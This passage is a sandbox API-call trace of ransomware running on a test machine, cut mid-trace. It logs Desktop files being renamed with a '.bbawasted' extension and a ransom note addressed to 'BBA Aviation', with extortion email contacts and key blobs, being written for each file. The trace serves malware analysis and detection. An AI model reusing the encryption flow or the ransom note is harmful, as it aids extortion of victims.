(lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\fqNkaNofmvsq.swf") returned 44 [0207.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x262) returned 0x6c4b88 [0207.265] lstrcpyW (in: lpString1=0x6c4be0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0207.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0207.265] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6790) returned 1 [0207.266] CryptGenRandom (in: hProv=0x6a6790, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0207.266] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0207.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\fqNkaNofmvsq.swf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\fqnkanofmvsq.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0207.427] WriteFile (in: hFile=0x294, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0207.439] SetEndOfFile (hFile=0x294) returned 1 [0207.443] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0207.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0207.443] lstrcpyW (in: lpString1=0x6c4be0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0207.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\fqNkaNofmvsq.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\fqnkanofmvsq.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\fqNkaNofmvsq.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\fqnkanofmvsq.swf.bbawasted")) returned 1 [0207.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\fqNkaNofmvsq.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\fqnkanofmvsq.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0207.446] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0207.448] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x6d5c [0207.448] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d5c) returned 0x640000 [0207.449] CloseHandle (hObject=0x280) returned 1 [0207.457] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0207.459] CloseHandle (hObject=0x27c) returned 1 [0207.459] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0207.459] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a63d8) returned 1 [0207.460] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0207.460] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0207.460] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a69b0) returned 1 [0207.461] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0207.461] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0207.763] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0207.763] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0207.764] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0207.764] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]JwhXWDktjZjfuirM3maw5uEA19e+v2WDU4TCzJlOlBqzJ3wevZ27nBJm0XkYsqo/\r\nNyh8PULMkNrf29DF7fTFyef4FuNLYGY3f1WVqqUL75V9fhJrHwFVpH1qNXOx8hOS\r\ntk4iVoYgSRLA5ICn1LbyBeRsECamC2xY4UIAkrOT8x2ll8jWk3IQSYlBzp+FVJRL\r\ncjrO7dKsIcIiFKFq94kdNJjjglo1MXW/cdr5GOLTcUShioGfJF7cUC6iaQX/d4du\r\nkUsVqjxVlIDWIaUMXLzZksKYEYWPQF0vZ74mrf9fQPSuBEovU8UluNCQKCV8vlGk\r\nLsNaC/0ENeu30a/J5zneb+za/5rKmBpYJADrolULcveK4/D5jim9byUYdA0pWTbA\r\nT5JD5f2LpopPsBSZsO81/FtH95R0hCDxyu35y7S7eGCNsczUWeObWDrlaVZ6l8OB\r\nkaKGPR60aqq8mVBL4xt8ko5D5eu5ItDuIn10ZM4T89c5vc46swPofxuWQi8lz1Ke\r\nx6liftk87HBHXejZJQ/ugZhMXO7wWkntD+eJS/CnOrco437L4vk+ifJnMZxp1l1q\r\nzdOljMB63uMf4PnVjYsYFuKlvYc+AGbJ+ozy9r7j93pwuXrAcukhGp0iaI3srL3o\r\nIkuIm0yKNaJ7Nk6f6T+CaqfzQdvo+3sNjxVRGY5RZ8p=[end_key]\r\nKEEP IT\r\n") returned 984 [0207.764] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0207.764] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0207.764] SetEndOfFile (hFile=0x294) returned 1 [0207.929] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0207.929] CloseHandle (hObject=0x294) returned 1 [0207.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0207.940] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b00b0 | out: hHeap=0x660000) returned 1 [0207.941] _aulldvrm () returned 0x0 [0207.941] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6460) returned 1 [0207.941] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0207.941] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0207.941] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jyg9v.mp3") returned 37 [0207.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x254) returned 0x6c4b88 [0207.942] lstrcpyW (in: lpString1=0x6c4bd2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0207.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0207.942] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f98) returned 1 [0207.942] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0207.942] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0207.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jyg9v.mp3.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\jyg9v.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0207.976] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0207.978] SetEndOfFile (hFile=0x294) returned 1 [0207.978] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0207.978] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0207.978] lstrcpyW (in: lpString1=0x6c4bd2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0207.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jyg9v.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\jyg9v.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jyg9v.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\jyg9v.mp3.bbawasted")) returned 1 [0207.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\jyg9v.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\jyg9v.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0207.980] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0207.980] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x3f08 [0207.980] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f08) returned 0x640000 [0207.980] CloseHandle (hObject=0x280) returned 1 [0207.984] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0207.984] CloseHandle (hObject=0x27c) returned 1 [0207.984] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0207.984] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0207.985] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0207.985] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0207.985] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6c58) returned 1 [0207.986] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0207.986] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0207.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0207.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0207.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0207.996] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ZgBuxkybUMhTuyfi/guYmYEC1LVKQPvLC+dBhhq6ZJfE5paEjDzSOKf2/9XdoaU9\r\nbX/+aEpQa6FTwp5zmJZmMflXY6fZhKUFwSO2pqErM3fHIq+FNqdlW9KmhA5a6UKc\r\nBgbGUJv3sYvjhBX1JlMf0TNp67/Lrb4orYMVqlMhCd1EUnP6zA761urRHXh4ymZ0\r\nIXUxYbqh0x/wDtd4pgoRZUcQFvZAANpiygdyvbgP81e8KKrBeLPpoHT5ie3I0mSt\r\nJD+htSwIrCr+EDWPvSnH6kHPTlzggDo70jYcTsU7tjdOYrpiLJcr1DcMmAoSgqkt\r\ngJ6wKNW5ZKKn18sSYWn2oeRkYCCiu7hK437IP6LJCfVYU5KiqI3eRye3LqXDjvyp\r\nzXQo+OoBT5YsZfngFt2PLyECumEjToeja0ytCoQGbHr9E/BKrXV3nm8H3Zuam4fk\r\nXe+Bo7gID+lVWLpt+trEJU05bS5IBZO2HZk4b5Qt9IQNtA3DIYPyBc6r+dQ9dQeD\r\n459eTr4CVvzR8+X02hZRhsf03dKu8o05AWAcfcQkmnZ9+/BClO0r+9ENi4am3I+i\r\ngd+XkAsPrx5LVrjVTIPYoc78B/sOHqVqVOqkXV66s45R/5rwD6H6mmqKwNHgkgxm\r\nXhq/a3IRFK3avptjeY1rDo52yME8Gw+2VNQpvrqxLMu=[end_key]\r\nKEEP IT\r\n") returned 984 [0207.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0207.996] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0207.996] SetEndOfFile (hFile=0x294) returned 1 [0207.999] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0207.999] CloseHandle (hObject=0x294) returned 1 [0208.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0208.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2738 | out: hHeap=0x660000) returned 1 [0208.001] _aulldvrm () returned 0x0 [0208.002] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a61b8) returned 1 [0208.002] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0208.002] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0208.002] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\KKKIx0E4FsY97cXx.mp3") returned 48 [0208.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6c4b88 [0208.003] lstrcpyW (in: lpString1=0x6c4be8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0208.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0208.003] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f10) returned 1 [0208.003] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0208.003] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0208.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\KKKIx0E4FsY97cXx.mp3.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\kkkix0e4fsy97cxx.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0208.005] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0208.007] SetEndOfFile (hFile=0x294) returned 1 [0208.095] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.095] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0208.095] lstrcpyW (in: lpString1=0x6c4be8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0208.095] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\KKKIx0E4FsY97cXx.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\kkkix0e4fsy97cxx.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\KKKIx0E4FsY97cXx.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\kkkix0e4fsy97cxx.mp3.bbawasted")) returned 1 [0208.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\KKKIx0E4FsY97cXx.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\kkkix0e4fsy97cxx.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0208.096] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0208.097] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xb17e [0208.097] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb17e) returned 0x640000 [0208.097] CloseHandle (hObject=0x27c) returned 1 [0208.416] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0208.416] CloseHandle (hObject=0x280) returned 1 [0208.417] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0208.417] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6bd0) returned 1 [0208.417] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0208.417] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0208.418] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6ac0) returned 1 [0208.418] CryptGenRandom (in: hProv=0x6a6ac0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0208.418] CryptReleaseContext (hProv=0x6a6ac0, dwFlags=0x0) returned 1 [0208.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0208.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0208.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0208.430] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Y1+p+eRghcXKe8nuBK7J9PF3kQOu2Qgy44j30auH7L2L323hJEwqiwBmfVoVgOG6\r\n60NiCWS7xBgNBDIga/xhbVW3hbFCI5Ym9fzOrQFTSiis7mxOlGTRHYycteNxhc4g\r\nFIsBgF1Y4AZjE66uJsKTHSyz+rI8xIYHLx2K/QLKy552RFbFXep5QWBUPc3PCRLx\r\niQuXrGNgL9uLIq7TL7F/Ccwq/4ORFuaR/xQurDP4Zz6d67iV/qLgqyk3e8CL2bCs\r\n9BI0xD9ihTzhw7wYrM7ACMCpqNqZm2t2Lk6TwCoSSHqwn5GvsaQx+oBB2LMmLU3j\r\nB9rnhlzu2EYHILmowL5J+jOpuWLVTmp8dPYm7BFRIf1y6pjp9kaOv+9WWK8WQnb1\r\nCisZsjfAxfGOTYPXM57ZkaC8mP9aiJ1z2OalIGvzhkhbRX2d+FG3ewnDLIuoPq2Q\r\naDjdsKPvd89GOMjfFEbgxA7qjI2h7iVQSMn/IEx69xy9Gf+UcegakrIyyHpTOrRg\r\nqNHzoEkXFFMXf6Di0Qr4WnNSy1qpQ5MuvYoeuSRwvPvsgAHvUuLwSqVAu1ZmulmS\r\nbEX6NB/sM2WgZQ/rNwo1fFxvsWS97gTsrMR+IAd3Q/X6MLKVIpOUkKJvMtRI+2F4\r\ngNStp/d9Cnsgf1ou/c6ehKepsOUZVsHRRzww22vbszD=[end_key]\r\nKEEP IT\r\n") returned 984 [0208.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0208.430] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0208.431] SetEndOfFile (hFile=0x294) returned 1 [0208.433] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0208.433] CloseHandle (hObject=0x294) returned 1 [0208.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0208.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b1ab0 | out: hHeap=0x660000) returned 1 [0208.436] _aulldvrm () returned 0x0 [0208.436] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6680) returned 1 [0208.437] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0208.437] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0208.437] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\O5 V_pS5-R96qlmtv.gif") returned 49 [0208.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26c) returned 0x6c4b88 [0208.438] lstrcpyW (in: lpString1=0x6c4bea, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0208.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0208.438] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6ce0) returned 1 [0208.438] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0208.438] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0208.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\O5 V_pS5-R96qlmtv.gif.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\o5 v_ps5-r96qlmtv.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0208.439] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0208.441] SetEndOfFile (hFile=0x294) returned 1 [0208.441] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0208.441] lstrcpyW (in: lpString1=0x6c4bea, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0208.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\O5 V_pS5-R96qlmtv.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\o5 v_ps5-r96qlmtv.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\O5 V_pS5-R96qlmtv.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\o5 v_ps5-r96qlmtv.gif.bbawasted")) returned 1 [0208.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\O5 V_pS5-R96qlmtv.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\o5 v_ps5-r96qlmtv.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 